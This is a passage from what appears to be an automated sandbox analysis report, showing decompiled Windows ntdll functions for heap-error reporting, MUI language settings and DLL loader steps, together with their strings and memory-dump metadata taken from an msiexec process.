                              							goto L21;
                              						case 9:
                              							goto L21;
                              						case 0xa:
                              							goto L21;
                              						case 0xb:
                              							goto L21;
                              						case 0xc:
                              							goto L21;
                              						case 0xd:
                              							goto L21;
                              						case 0xe:
                              							goto L21;
                              						case 0xf:
                              							goto L21;
                              					}
                              				}
                              				L21:
                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                              					_push(_t104);
                              					E04D0B150();
                              				} else {
                              					E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                              				}
                              				_push(_t105);
                              				E04D0B150("Error code: %d - %s\n",  *0x4df5898);
                              				_t113 =  *0x4df58a4; // 0x0
                              				if(_t113 != 0) {
                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                              						_push(_t104);
                              						E04D0B150();
                              					} else {
                              						E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                              					}
                              					E04D0B150("Parameter1: %p\n",  *0x4df58a4);
                              				}
                              				_t115 =  *0x4df58a8; // 0x0
                              				if(_t115 != 0) {
                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                              						_push(_t104);
                              						E04D0B150();
                              					} else {
                              						E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                              					}
                              					E04D0B150("Parameter2: %p\n",  *0x4df58a8);
                              				}
                              				_t117 =  *0x4df58ac; // 0x0
                              				if(_t117 != 0) {
                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                              						_push(_t104);
                              						E04D0B150();
                              					} else {
                              						E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                              					}
                              					E04D0B150("Parameter3: %p\n",  *0x4df58ac);
                              				}
                              				_t119 =  *0x4df58b0; // 0x0
                              				if(_t119 != 0) {
                              					L41:
                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                              						_push(_t104);
                              						E04D0B150();
                              					} else {
                              						E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                              					}
                              					_push( *0x4df58b4);
                              					E04D0B150("Last known valid blocks: before - %p, after - %p\n",  *0x4df58b0);
                              				} else {
                              					_t120 =  *0x4df58b4; // 0x0
                              					if(_t120 != 0) {
                              						goto L41;
                              					}
                              				}
                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                              					_push(_t104);
                              					E04D0B150();
                              				} else {
                              					E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                              				}
                              				return E04D0B150("Stack trace available at %p\n", 0x4df58c0);
                              			}












                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                              • API String ID: 0-2897834094
                              • Opcode ID: b3cbaa4e134dcda0101d6cbe7859bd057a589fb46931cce6f18bacce83d35eef
                              • Instruction ID: 81ed5142526ed196d29a92310fc4e0f779090bee9b7dae006091a092e8ef56a6
                              • Opcode Fuzzy Hash: b3cbaa4e134dcda0101d6cbe7859bd057a589fb46931cce6f18bacce83d35eef
                              • Instruction Fuzzy Hash: 7461C432714166EFE351AB85D995A38B3E6EB04A30B49807EF50D5B352D638FC409E2A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 96%
                              			E04D13D34(signed int* __ecx) {
                              				signed int* _v8;
                              				char _v12;
                              				signed int* _v16;
                              				signed int* _v20;
                              				char _v24;
                              				signed int _v28;
                              				signed int _v32;
                              				char _v36;
                              				signed int _v40;
                              				signed int _v44;
                              				signed int* _v48;
                              				signed int* _v52;
                              				signed int _v56;
                              				signed int _v60;
                              				char _v68;
                              				signed int _t140;
                              				signed int _t161;
                              				signed int* _t236;
                              				signed int* _t242;
                              				signed int* _t243;
                              				signed int* _t244;
                              				signed int* _t245;
                              				signed int _t255;
                              				void* _t257;
                              				signed int _t260;
                              				void* _t262;
                              				signed int _t264;
                              				void* _t267;
                              				signed int _t275;
                              				signed int* _t276;
                              				short* _t277;
                              				signed int* _t278;
                              				signed int* _t279;
                              				signed int* _t280;
                              				short* _t281;
                              				signed int* _t282;
                              				short* _t283;
                              				signed int* _t284;
                              				void* _t285;
                              
                              				_v60 = _v60 | 0xffffffff;
                              				_t280 = 0;
                              				_t242 = __ecx;
                              				_v52 = __ecx;
                              				_v8 = 0;
                              				_v20 = 0;
                              				_v40 = 0;
                              				_v28 = 0;
                              				_v32 = 0;
                              				_v44 = 0;
                              				_v56 = 0;
                              				_t275 = 0;
                              				_v16 = 0;
                              				if(__ecx == 0) {
                              					_t280 = 0xc000000d;
                              					_t140 = 0;
                              					L50:
                              					 *_t242 =  *_t242 | 0x00000800;
                              					_t242[0x13] = _t140;
                              					_t242[0x16] = _v40;
                              					_t242[0x18] = _v28;
                              					_t242[0x14] = _v32;
                              					_t242[0x17] = _t275;
                              					_t242[0x15] = _v44;
                              					_t242[0x11] = _v56;
                              					_t242[0x12] = _v60;
                              					return _t280;
                              				}
                              				if(E04D11B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                              					_v56 = 1;
                              					if(_v8 != 0) {
                              						L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                              					}
                              					_v8 = _t280;
                              				}
                              				if(E04D11B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                              					_v60 =  *_v8;
                              					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                              					_v8 = _t280;
                              				}
                              				if(E04D11B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                              					L16:
                              					if(E04D11B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                              						L28:
                              						if(E04D11B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                              							L46:
                              							_t275 = _v16;
                              							L47:
                              							_t161 = 0;
                              							L48:
                              							if(_v8 != 0) {
                              								L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                              							}
                              							_t140 = _v20;
                              							if(_t140 != 0) {
                              								if(_t275 != 0) {
                              									L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                              									_t275 = 0;
                              									_v28 = 0;
                              									_t140 = _v20;
                              								}
                              							}
                              							goto L50;
                              						}
                              						_t167 = _v12;
                              						_t255 = _v12 + 4;
                              						_v44 = _t255;
                              						if(_t255 == 0) {
                              							_t276 = _t280;
                              							_v32 = _t280;
                              						} else {
                              							_t276 = L04D24620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                              							_t167 = _v12;
                              							_v32 = _t276;
                              						}
                              						if(_t276 == 0) {
                              							_v44 = _t280;
                              							_t280 = 0xc0000017;
                              							goto L46;
                              						} else {
                              							E04D4F3E0(_t276, _v8, _t167);
                              							_v48 = _t276;
                              							_t277 = E04D51370(_t276, 0x4ce4e90);
                              							_pop(_t257);
                              							if(_t277 == 0) {
                              								L38:
                              								_t170 = _v48;
                              								if( *_v48 != 0) {
                              									E04D4BB40(0,  &_v68, _t170);
                              									if(L04D143C0( &_v68,  &_v24) != 0) {
                              										_t280 =  &(_t280[0]);
                              									}
                              								}
                              								if(_t280 == 0) {
                              									_t280 = 0;
                              									L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                              									_v44 = 0;
                              									_v32 = 0;
                              								} else {
                              									_t280 = 0;
                              								}
                              								_t174 = _v8;
                              								if(_v8 != 0) {
                              									L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                              								}
                              								_v8 = _t280;
                              								goto L46;
                              							}
                              							_t243 = _v48;
                              							do {
                              								 *_t277 = 0;
                              								_t278 = _t277 + 2;
                              								E04D4BB40(_t257,  &_v68, _t243);
                              								if(L04D143C0( &_v68,  &_v24) != 0) {
                              									_t280 =  &(_t280[0]);
                              								}
                              								_t243 = _t278;
                              								_t277 = E04D51370(_t278, 0x4ce4e90);
                              								_pop(_t257);
                              							} while (_t277 != 0);
                              							_v48 = _t243;
                              							_t242 = _v52;
                              							goto L38;
                              						}
                              					}
                              					_t191 = _v12;
                              					_t260 = _v12 + 4;
                              					_v28 = _t260;
                              					if(_t260 == 0) {
                              						_t275 = _t280;
                              						_v16 = _t280;
                              					} else {
                              						_t275 = L04D24620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                              						_t191 = _v12;
                              						_v16 = _t275;
                              					}
                              					if(_t275 == 0) {
                              						_v28 = _t280;
                              						_t280 = 0xc0000017;
                              						goto L47;
                              					} else {
                              						E04D4F3E0(_t275, _v8, _t191);
                              						_t285 = _t285 + 0xc;
                              						_v48 = _t275;
                              						_t279 = _t280;
                              						_t281 = E04D51370(_v16, 0x4ce4e90);
                              						_pop(_t262);
                              						if(_t281 != 0) {
                              							_t244 = _v48;
                              							do {
                              								 *_t281 = 0;
                              								_t282 = _t281 + 2;
                              								E04D4BB40(_t262,  &_v68, _t244);
                              								if(L04D143C0( &_v68,  &_v24) != 0) {
                              									_t279 =  &(_t279[0]);
                              								}
                              								_t244 = _t282;
                              								_t281 = E04D51370(_t282, 0x4ce4e90);
                              								_pop(_t262);
                              							} while (_t281 != 0);
                              							_v48 = _t244;
                              							_t242 = _v52;
                              						}
                              						_t201 = _v48;
                              						_t280 = 0;
                              						if( *_v48 != 0) {
                              							E04D4BB40(_t262,  &_v68, _t201);
                              							if(L04D143C0( &_v68,  &_v24) != 0) {
                              								_t279 =  &(_t279[0]);
                              							}
                              						}
                              						if(_t279 == 0) {
                              							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                              							_v28 = _t280;
                              							_v16 = _t280;
                              						}
                              						_t202 = _v8;
                              						if(_v8 != 0) {
                              							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                              						}
                              						_v8 = _t280;
                              						goto L28;
                              					}
                              				}
                              				_t214 = _v12;
                              				_t264 = _v12 + 4;
                              				_v40 = _t264;
                              				if(_t264 == 0) {
                              					_v20 = _t280;
                              				} else {
                              					_t236 = L04D24620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                              					_t280 = _t236;
                              					_v20 = _t236;
                              					_t214 = _v12;
                              				}
                              				if(_t280 == 0) {
                              					_t161 = 0;
                              					_t280 = 0xc0000017;
                              					_v40 = 0;
                              					goto L48;
                              				} else {
                              					E04D4F3E0(_t280, _v8, _t214);
                              					_t285 = _t285 + 0xc;
                              					_v48 = _t280;
                              					_t283 = E04D51370(_t280, 0x4ce4e90);
                              					_pop(_t267);
                              					if(_t283 != 0) {
                              						_t245 = _v48;
                              						do {
                              							 *_t283 = 0;
                              							_t284 = _t283 + 2;
                              							E04D4BB40(_t267,  &_v68, _t245);
                              							if(L04D143C0( &_v68,  &_v24) != 0) {
                              								_t275 = _t275 + 1;
                              							}
                              							_t245 = _t284;
                              							_t283 = E04D51370(_t284, 0x4ce4e90);
                              							_pop(_t267);
                              						} while (_t283 != 0);
                              						_v48 = _t245;
                              						_t242 = _v52;
                              					}
                              					_t224 = _v48;
                              					_t280 = 0;
                              					if( *_v48 != 0) {
                              						E04D4BB40(_t267,  &_v68, _t224);
                              						if(L04D143C0( &_v68,  &_v24) != 0) {
                              							_t275 = _t275 + 1;
                              						}
                              					}
                              					if(_t275 == 0) {
                              						L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                              						_v40 = _t280;
                              						_v20 = _t280;
                              					}
                              					_t225 = _v8;
                              					if(_v8 != 0) {
                              						L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                              					}
                              					_v8 = _t280;
                              					goto L16;
                              				}
                              			}

                              Strings
                              • Kernel-MUI-Language-Disallowed, xrefs: 04D13E97
                              • WindowsExcludedProcs, xrefs: 04D13D6F
                              • Kernel-MUI-Number-Allowed, xrefs: 04D13D8C
                              • Kernel-MUI-Language-SKU, xrefs: 04D13F70
                              • Kernel-MUI-Language-Allowed, xrefs: 04D13DC0
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                              • API String ID: 0-258546922
                              • Opcode ID: d1de1fc8c140969dae31ba917aa62d84ad707690a75461382dc174fad7021c75
                              • Instruction ID: 4d5b5419afee154e9080602a5013f6f600fc66823f6d4b5e195bcdd03ff12526
                              • Opcode Fuzzy Hash: d1de1fc8c140969dae31ba917aa62d84ad707690a75461382dc174fad7021c75
                              • Instruction Fuzzy Hash: C6F13F71E01618EFDF15DF99D980AEEB7B9FF48754F14015AE905A7220E730AE01DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 44%
                              			E04D38E00(void* __ecx) {
                              				signed int _v8;
                              				char _v12;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				intOrPtr* _t32;
                              				intOrPtr _t35;
                              				intOrPtr _t43;
                              				void* _t46;
                              				intOrPtr _t47;
                              				void* _t48;
                              				signed int _t49;
                              				void* _t50;
                              				intOrPtr* _t51;
                              				signed int _t52;
                              				void* _t53;
                              				intOrPtr _t55;
                              
                              				_v8 =  *0x4dfd360 ^ _t52;
                              				_t49 = 0;
                              				_t48 = __ecx;
                              				_t55 =  *0x4df8464; // 0x73b80110
                              				if(_t55 == 0) {
                              					L9:
                              					if( !_t49 >= 0) {
                              						if(( *0x4df5780 & 0x00000003) != 0) {
                              							E04D85510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                              						}
                              						if(( *0x4df5780 & 0x00000010) != 0) {
                              							asm("int3");
                              						}
                              					}
                              					return E04D4B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                              				}
                              				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                              				_t43 =  *0x4df7984; // 0x3052bc8
                              				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                              					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                              					if(_t48 == _t43) {
                              						_t50 = 0x5c;
                              						if( *_t32 == _t50) {
                              							_t46 = 0x3f;
                              							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                              								_t32 = _t32 + 8;
                              							}
                              						}
                              					}
                              					_t51 =  *0x4df8464; // 0x73b80110
                              					 *0x4dfb1e0(_t47, _t32,  &_v12);
                              					_t49 =  *_t51();
                              					if(_t49 >= 0) {
                              						L8:
                              						_t35 = _v12;
                              						if(_t35 != 0) {
                              							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                              								E04D39B10( *((intOrPtr*)(_t48 + 0x48)));
                              								_t35 = _v12;
                              							}
                              							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                              						}
                              						goto L9;
                              					}
                              					if(_t49 != 0xc000008a) {
                              						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                              							if(_t49 != 0xc00000bb) {
                              								goto L8;
                              							}
                              						}
                              					}
                              					if(( *0x4df5780 & 0x00000005) != 0) {
                              						_push(_t49);
                              						E04D85510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                              						_t53 = _t53 + 0x1c;
                              					}
                              					_t49 = 0;
                              					goto L8;
                              				} else {
                              					goto L9;
                              				}
                              			}

                              Strings
                              • Querying the active activation context failed with status 0x%08lx, xrefs: 04D79357
                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 04D7932A
                              • LdrpFindDllActivationContext, xrefs: 04D79331, 04D7935D
                              • minkernel\ntdll\ldrsnap.c, xrefs: 04D7933B, 04D79367
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                              • API String ID: 0-3779518884
                              • Opcode ID: ee7b58c5aa294c36228ef6f97992a01eceba44848d93c1b30d47a8a4f5daec85
                              • Instruction ID: 87bfe76c7b928b7ff86fb0170bb2303c3324bd8fe4b20549a123b8e5569e0c41
                              • Opcode Fuzzy Hash: ee7b58c5aa294c36228ef6f97992a01eceba44848d93c1b30d47a8a4f5daec85
                              • Instruction Fuzzy Hash: E341F632B00315AFDF35BE188898A75B6F5FB00746F05817AF85577151EB62BC80A781
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 83%
                              			E04D18794(void* __ecx) {
                              				signed int _v0;
                              				char _v8;
                              				signed int _v12;
                              				void* _v16;
                              				signed int _v20;
                              				intOrPtr _v24;
                              				signed int _v28;
                              				signed int _v32;
                              				signed int _v40;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				intOrPtr* _t77;
                              				signed int _t80;
                              				signed char _t81;
                              				signed int _t87;
                              				signed int _t91;
                              				void* _t92;
                              				void* _t94;
                              				signed int _t95;
                              				signed int _t103;
                              				signed int _t105;
                              				signed int _t110;
                              				signed int _t118;
                              				intOrPtr* _t121;
                              				intOrPtr _t122;
                              				signed int _t125;
                              				signed int _t129;
                              				signed int _t131;
                              				signed int _t134;
                              				signed int _t136;
                              				signed int _t143;
                              				signed int* _t147;
                              				signed int _t151;
                              				void* _t153;
                              				signed int* _t157;
                              				signed int _t159;
                              				signed int _t161;
                              				signed int _t166;
                              				signed int _t168;
                              
                              				_push(__ecx);
                              				_t153 = __ecx;
                              				_t159 = 0;
                              				_t121 = __ecx + 0x3c;
                              				if( *_t121 == 0) {
                              					L2:
                              					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                              					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                              						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                              						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                              						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                              							L6:
                              							if(E04D1934A() != 0) {
                              								_t159 = E04D8A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                              								__eflags = _t159;
                              								if(_t159 < 0) {
                              									_t81 =  *0x4df5780; // 0x0
                              									__eflags = _t81 & 0x00000003;
                              									if((_t81 & 0x00000003) != 0) {
                              										_push(_t159);
                              										E04D85510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                              										_t81 =  *0x4df5780; // 0x0
                              									}
                              									__eflags = _t81 & 0x00000010;
                              									if((_t81 & 0x00000010) != 0) {
                              										asm("int3");
                              									}
                              								}
                              							}
                              						} else {
                              							_t159 = E04D1849B(0, _t122, _t153, _t159, _t180);
                              							if(_t159 >= 0) {
                              								goto L6;
                              							}
                              						}
                              						_t80 = _t159;
                              						goto L8;
                              					} else {
                              						_t125 = 0x13;
                              						asm("int 0x29");
                              						_push(0);
                              						_push(_t159);
                              						_t161 = _t125;
                              						_t87 =  *( *[fs:0x30] + 0x1e8);
                              						_t143 = 0;
                              						_v40 = _t161;
                              						_t118 = 0;
                              						_push(_t153);
                              						__eflags = _t87;
                              						if(_t87 != 0) {
                              							_t118 = _t87 + 0x5d8;
                              							__eflags = _t118;
                              							if(_t118 == 0) {
                              								L46:
                              								_t118 = 0;
                              							} else {
                              								__eflags =  *(_t118 + 0x30);
                              								if( *(_t118 + 0x30) == 0) {
                              									goto L46;
                              								}
                              							}
                              						}
                              						_v32 = 0;
                              						_v28 = 0;
                              						_v16 = 0;
                              						_v20 = 0;
                              						_v12 = 0;
                              						__eflags = _t118;
                              						if(_t118 != 0) {
                              							__eflags = _t161;
                              							if(_t161 != 0) {
                              								__eflags =  *(_t118 + 8);
                              								if( *(_t118 + 8) == 0) {
                              									L22:
                              									_t143 = 1;
                              									__eflags = 1;
                              								} else {
                              									_t19 = _t118 + 0x40; // 0x40
                              									_t156 = _t19;
                              									E04D18999(_t19,  &_v16);
                              									__eflags = _v0;
                              									if(_v0 != 0) {
                              										__eflags = _v0 - 1;
                              										if(_v0 != 1) {
                              											goto L22;
                              										} else {
                              											_t128 =  *(_t161 + 0x64);
                              											__eflags =  *(_t161 + 0x64);
                              											if( *(_t161 + 0x64) == 0) {
                              												goto L22;
                              											} else {
                              												E04D18999(_t128,  &_v12);
                              												_t147 = _v12;
                              												_t91 = 0;
                              												__eflags = 0;
                              												_t129 =  *_t147;
                              												while(1) {
                              													__eflags =  *((intOrPtr*)(0x4df5c60 + _t91 * 8)) - _t129;
                              													if( *((intOrPtr*)(0x4df5c60 + _t91 * 8)) == _t129) {
                              														break;
                              													}
                              													_t91 = _t91 + 1;
                              													__eflags = _t91 - 5;
                              													if(_t91 < 5) {
                              														continue;
                              													} else {
                              														_t131 = 0;
                              														__eflags = 0;
                              													}
                              													L37:
                              													__eflags = _t131;
                              													if(_t131 != 0) {
                              														goto L22;
                              													} else {
                              														__eflags = _v16 - _t147;
                              														if(_v16 != _t147) {
                              															goto L22;
                              														} else {
                              															E04D22280(_t92, 0x4df86cc);
                              															_t94 = E04DD9DFB( &_v20);
                              															__eflags = _t94 - 1;
                              															if(_t94 != 1) {
                              															}
                              															asm("movsd");
                              															asm("movsd");
                              															asm("movsd");
                              															asm("movsd");
                              															 *_t118 =  *_t118 + 1;
                              															asm("adc dword [ebx+0x4], 0x0");
                              															_t95 = E04D361A0( &_v32);
                              															__eflags = _t95;
                              															if(_t95 != 0) {
                              																__eflags = _v32 | _v28;
                              																if((_v32 | _v28) != 0) {
                              																	_t71 = _t118 + 0x40; // 0x3f
                              																	_t134 = _t71;
                              																	goto L55;
                              																}
                              															}
                              															goto L30;
                              														}
                              													}
                              													goto L56;
                              												}
                              												_t92 = 0x4df5c64 + _t91 * 8;
                              												asm("lock xadd [eax], ecx");
                              												_t131 = (_t129 | 0xffffffff) - 1;
                              												goto L37;
                              											}
                              										}
                              										goto L56;
                              									} else {
                              										_t143 = E04D18A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                              										__eflags = _t143;
                              										if(_t143 != 0) {
                              											_t157 = _v12;
                              											_t103 = 0;
                              											__eflags = 0;
                              											_t136 =  &(_t157[1]);
                              											 *(_t161 + 0x64) = _t136;
                              											_t151 =  *_t157;
                              											_v20 = _t136;
                              											while(1) {
                              												__eflags =  *((intOrPtr*)(0x4df5c60 + _t103 * 8)) - _t151;
                              												if( *((intOrPtr*)(0x4df5c60 + _t103 * 8)) == _t151) {
                              													break;
                              												}
                              												_t103 = _t103 + 1;
                              												__eflags = _t103 - 5;
                              												if(_t103 < 5) {
                              													continue;
                              												}
                              												L21:
                              												_t105 = E04D4F380(_t136, 0x4ce1184, 0x10);
                              												__eflags = _t105;
                              												if(_t105 != 0) {
                              													__eflags =  *_t157 -  *_v16;
                              													if( *_t157 >=  *_v16) {
                              														goto L22;
                              													} else {
                              														asm("cdq");
                              														_t166 = _t157[5] & 0x0000ffff;
                              														_t108 = _t157[5] & 0x0000ffff;
                              														asm("cdq");
                              														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                              														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                              														if(__eflags > 0) {
                              															L29:
                              															E04D22280(_t108, 0x4df86cc);
                              															 *_t118 =  *_t118 + 1;
                              															_t42 = _t118 + 0x40; // 0x3f
                              															_t156 = _t42;
                              															asm("adc dword [ebx+0x4], 0x0");
                              															asm("movsd");
                              															asm("movsd");
                              															asm("movsd");
                              															asm("movsd");
                              															_t110 = E04D361A0( &_v32);
                              															__eflags = _t110;
                              															if(_t110 != 0) {
                              																__eflags = _v32 | _v28;
                              																if((_v32 | _v28) != 0) {
                              																	_t134 = _v20;
                              																	L55:
                              																	E04DD9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                              																}
                              															}
                              															L30:
                              															 *_t118 =  *_t118 + 1;
                              															asm("adc dword [ebx+0x4], 0x0");
                              															E04D1FFB0(_t118, _t156, 0x4df86cc);
                              															goto L22;
                              														} else {
                              															if(__eflags < 0) {
                              																goto L22;
                              															} else {
                              																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                              																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                              																	goto L22;
                              																} else {
                              																	goto L29;
                              																}
                              															}
                              														}
                              													}
                              													goto L56;
                              												}
                              												goto L22;
                              											}
                              											asm("lock inc dword [eax]");
                              											goto L21;
                              										}
                              									}
                              								}
                              							}
                              						}
                              						return _t143;
                              					}
                              				} else {
                              					_push( &_v8);
                              					_push( *((intOrPtr*)(__ecx + 0x50)));
                              					_push(__ecx + 0x40);
                              					_push(_t121);
                              					_push(0xffffffff);
                              					_t80 = E04D49A00();
                              					_t159 = _t80;
                              					if(_t159 < 0) {
                              						L8:
                              						return _t80;
                              					} else {
                              						goto L2;
                              					}
                              				}
                              				L56:
                              			}

                              Strings
                              • minkernel\ntdll\ldrsnap.c, xrefs: 04D69C28
                              • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04D69C18
                              • LdrpDoPostSnapWork, xrefs: 04D69C1E
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                              • API String ID: 0-1948996284
                              • Opcode ID: c450c42aeec325f92ff0cd2e5b677cbaa27c7ed96ad87da9c8b343a699f11314
                              • Instruction ID: 8ebe9ece9284c68b8755f52e45f8858481c8f41cd0566a6954b3c70d6903c54b
                              • Opcode Fuzzy Hash: c450c42aeec325f92ff0cd2e5b677cbaa27c7ed96ad87da9c8b343a699f11314
                              • Instruction Fuzzy Hash: 9C91E071B00216BBDB28EF59E4909BAB3B5FF45344B1541A9FC05AB260E730FD01EBA0
                              Uniqueness

